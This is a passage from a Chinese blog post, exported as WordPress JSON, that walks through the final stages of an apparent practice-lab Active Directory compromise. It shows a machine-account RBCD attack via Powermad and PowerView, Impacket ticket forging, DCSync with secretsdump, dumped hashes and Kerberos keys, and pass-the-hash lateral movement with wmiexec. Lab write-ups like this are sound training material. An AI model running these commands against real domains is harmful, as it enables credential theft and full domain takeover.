loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"482\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/14-3-1024x482.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2642\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>UserName: zhangxin\nPassword: admin4qwY38cc<\/code><\/pre>\n\n\n\n<p>\u63a5\u4e0b\u6765\u6253RBCD\uff0c\u53c2\u8003<a href=\"https:\/\/zhuanlan.zhihu.com\/p\/549838653?utm_id=0\">\u57df\u6e17\u900f\u4e4b\u59d4\u6d3e\u653b\u51fb\u5168\u96c6<\/a>\u91cc\u7684<strong>Acount Operators\u7ec4\u7528\u6237\u62ff\u4e0b\u4e3b\u673a<\/strong>\u3002\u8fd9\u91cc\u5229\u7528\u8fc7\u7a0b\u9664\u4e86\u6211\u4eec\u4e4b\u524d\u7528\u8fc7\u7684powerview.ps1\u591a\u4e86\u4e00\u4e2aPowermad.ps1(https:\/\/github.com\/Kevin-Robertson\/Powermad\/blob\/master\/Powermad.ps1)<\/p>\n\n\n\n<p>\u7136\u540e\u5bf9\u7740\u6211\u7684\u914d\u5c31\u884c\u4e86<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/19-1-1024x573.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"573\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/19-1-1024x573.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2644\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>PS C:\\Users\\zhangxin\\Desktop&gt; Set-ExecutionPolicy Bypass -Scope Process\n\n\u6267\u884c\u7b56\u7565\u66f4\u6539\n\u6267\u884c\u7b56\u7565\u53ef\u5e2e\u52a9\u4f60\u9632\u6b62\u6267\u884c\u4e0d\u4fe1\u4efb\u7684\u811a\u672c\u3002\u66f4\u6539\u6267\u884c\u7b56\u7565\u53ef\u80fd\u4f1a\u4ea7\u751f\u5b89\u5168\u98ce\u9669\uff0c\u5982\nhttps:\/go.microsoft.com\/fwlink\/?LinkID=135170 \u4e2d\u7684 about_Execution_Policies \u5e2e\u52a9\u4e3b\u9898\u6240\u8ff0\u3002\u662f\u5426\u8981\u66f4\u6539\u6267\u884c\u7b56\u7565?\n&#91;Y] \u662f(Y)  &#91;A] \u5168\u662f(A)  &#91;N] \u5426(N)  &#91;L] \u5168\u5426(L)  &#91;S] \u6682\u505c(S)  &#91;?] \u5e2e\u52a9 (\u9ed8\u8ba4\u503c\u4e3a\u201cN\u201d): Y\nPS C:\\Users\\zhangxin\\Desktop&gt; import-module .\\Powermad.ps1\nPS C:\\Users\\zhangxin\\Desktop&gt; New-MachineAccount -MachineAccount test -Password $(ConvertTo-SecureString \"123456\" -AsPlainText -Force)\n&#91;+] Machine account test added\nPS C:\\Users\\zhangxin\\Desktop&gt; import-module .\\powerview.ps1\nPS C:\\Users\\zhangxin\\Desktop&gt; Get-NetComputer test -Properties objectsid\n\nobjectsid\n---------\nS-1-5-21-3535393121-624993632-895678587-1117\n\n\nPS C:\\Users\\zhangxin\\Desktop&gt; $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList \"O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3535393121-624993632-895678587-1117)\"\nPS C:\\Users\\zhangxin\\Desktop&gt; $SDBytes = New-Object byte&#91;] ($SD.BinaryLength)\nPS C:\\Users\\zhangxin\\Desktop&gt; $SD.GetBinaryForm($SDBytes, 0)\nPS C:\\Users\\zhangxin\\Desktop&gt; Get-DomainComputer Fileserver| Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose\n\u8be6\u7ec6\u4fe1\u606f: &#91;Get-DomainSearcher] search string: LDAP:\/\/DC.xiaorang.lab\/DC=xiaorang,DC=lab\n\u8be6\u7ec6\u4fe1\u606f: &#91;Get-DomainObject] Get-DomainObject filter string:\n(&amp;(|(distinguishedname=CN=FILESERVER,CN=Computers,DC=xiaorang,DC=lab)))\n\u8be6\u7ec6\u4fe1\u606f: &#91;Set-DomainObject] Setting 'msds-allowedtoactonbehalfofotheridentity' to '1 0 4 128 20 0 0 0 0 0 0 0 0 0 0\n 0 36 0 0 0 1 2 0 0 0 0 0 5 32 0 0 0 32 2 0 0 2 0 44 0 1 0 0 0 0 0 36 0 255 1 15 0 1 5 0 0 0 0 0 5 21 0 0 0 97 209\n185 210 96 165 64 37 123 248 98 53 93 4 0 0' for object 'FILESERVER$'\nPS C:\\Users\\zhangxin\\Desktop&gt;<\/code><\/pre>\n\n\n\n<p>\u914d\u5b8c\u4e86\u8bb0\u5f97\u6539\u672c\u5730\u7684\/etc\/hosts\uff0c\u4e0d\u7136\u8fde\u4e0d\u4e0a\u53bb<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/20.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"614\" height=\"240\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/20.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2645\"  sizes=\"auto, (max-width: 614px) 100vw, 614px\" \/><\/div><\/figure>\n\n\n\n<p>\u63a5\u4e0b\u6765\u8001\u5957\u8def\u7533\u8bf7\u7968\u636e\u5c31\u884c\u4e86<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>proxychains python3 getST.py -dc-ip 172.22.60.8 xiaorang.lab\/test\\$:123456 -spn cifs\/Fileserver.xiaorang.lab -impersonate administrator\nexport KRB5CCNAME=administrator.ccache\nproxychains python3 psexec.py Administrator@FILESERVER.xiaorang.lab -k -no-pass -dc-ip 172.22.60.8 -codec gbk<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/21.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"604\" height=\"208\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/21.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2646\"  sizes=\"auto, (max-width: 604px) 100vw, 604px\" \/><\/div><\/figure>\n\n\n\n<p>\u8fd9\u4e00\u5957\u6d41\u7a0b\u540c\u6837\u80fd\u6253PC1\u4e0a\u7684flag2\u7684\uff0c\u56e0\u4e3a\u6211\u4eec\u7528\u6237\u7ec4\u80fd\u6539\u975e\u57df\u63a7\u7684\u6240\u6709\u673a\u5668\uff0c\u4f46\u8fd9\u6837\u6bd4\u8f83\u8822\uff0c\u6bd5\u7adf\u6253\u5b8cFILESERVER\u4e0b\u4e00\u6b65\u90fd\u80fd\u62ff\u57df\u63a7\u4e86\uff0c\u540e\u9762\u6a2a\u4f20flag2\u5c31\u884c\u4e86<\/p>\n\n\n\n<p>\u5148\u6293\u4e00\u4e0bFILESERVER\u7684\u54c8\u5e0c<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>proxychains python3 secretsdump.py -k -no-pass Fileserver.xiaorang.lab -dc-ip 172.22.60.8<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/22.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"668\" height=\"345\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/22.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2647\"  sizes=\"auto, (max-width: 668px) 100vw, 668px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>XIAORANG\\Fileserver$:aad3b435b51404eeaad3b435b51404ee:951d8a9265dfb652f42e5c8c497d70dc:::<\/code><\/pre>\n\n\n\n<p>\u54c8\u5e0c\u662f951d8a9265dfb652f42e5c8c497d70dc\uff0c\u63a5\u4e0b\u6765\u7528Fileserver\u673a\u5668\u8d26\u6237\u8fdb\u884cDCSync<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>proxychains secretsdump.py xiaorang.lab\/'Fileserver$':@172.22.60.8 -hashes ':951d8a9265dfb652f42e5c8c497d70dc' -just-dc-user Administrator<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>Administrator:500:aad3b435b51404eeaad3b435b51404ee:c3cfdc08527ec4ab6aa3e630e79d349b:::\n&#91;*] Kerberos keys grabbed\nAdministrator:aes256-cts-hmac-sha1-96:4502e83276d2275a8f22a0be848aee62471ba26d29e0a01e2e09ddda4ceea683\nAdministrator:aes128-cts-hmac-sha1-96:38496df9a109710192750f2fbdbe45b9\nAdministrator:des-cbc-md5:f72a9889a18cc408<\/code><\/pre>\n\n\n\n<p>c3cfdc08527ec4ab6aa3e630e79d349b\u5c31\u662f\u57df\u63a7\u54c8\u5e0c\u4e86\uff0c\u540e\u9762\u6a2a\u4f20\u5373\u53ef<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>proxychains python3 wmiexec.py -hashes :c3cfdc08527ec4ab6aa3e630e79d349b Administrator@172.22.60.8 -codec gbk<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/23.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"710\" height=\"428\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/23.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2648\"  sizes=\"auto, (max-width: 710px) 100vw, 710px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>proxychains python3 wmiexec.py -hashes :c3cfdc08527ec4ab6aa3e630e79d349b xiaorang.lab\/Administrator@172.22.60.15 -codec gbk<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/16-2.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"528\" height=\"188\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/16-2.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2649\"  sizes=\"auto, (max-width: 528px) 100vw, 528px\" \/><\/div><\/figure>\n\n\n\n<p>\u6253\u5b8c\u4e00\u6b21\u548c\u865a\u8131\u4e86\u4e00\u6837\uff0c\u5509<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u8003\u70b9:<br \/>\nFlarum\u540e\u53f0RCE<br \/>\ncapabilities\u63d0\u6743\u2014\u2014openssl\u547d\u4ee4<br \/>\nAS-REP Roasting<br \/>\n\u6293xshell\u5bc6\u7801<br \/>\nAcount Operators\u7ec4\u7528\u6237\u6253RBCD<br \/>\nDCSync<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11],"tags":[],"class_list":["post-2626","post","type-post","status-publish","format-standard","hentry","category-11"],"_links":{"self":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/2626","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/comments?post=2626"}],"version-history":[{"count":7,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/2626\/revisions"}],"predecessor-version":[{"id":2658,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/2626\/revisions\/2658"}],"wp:attachment":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/media?parent=2626"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/categories?post=2626"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/tags?post=2626"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}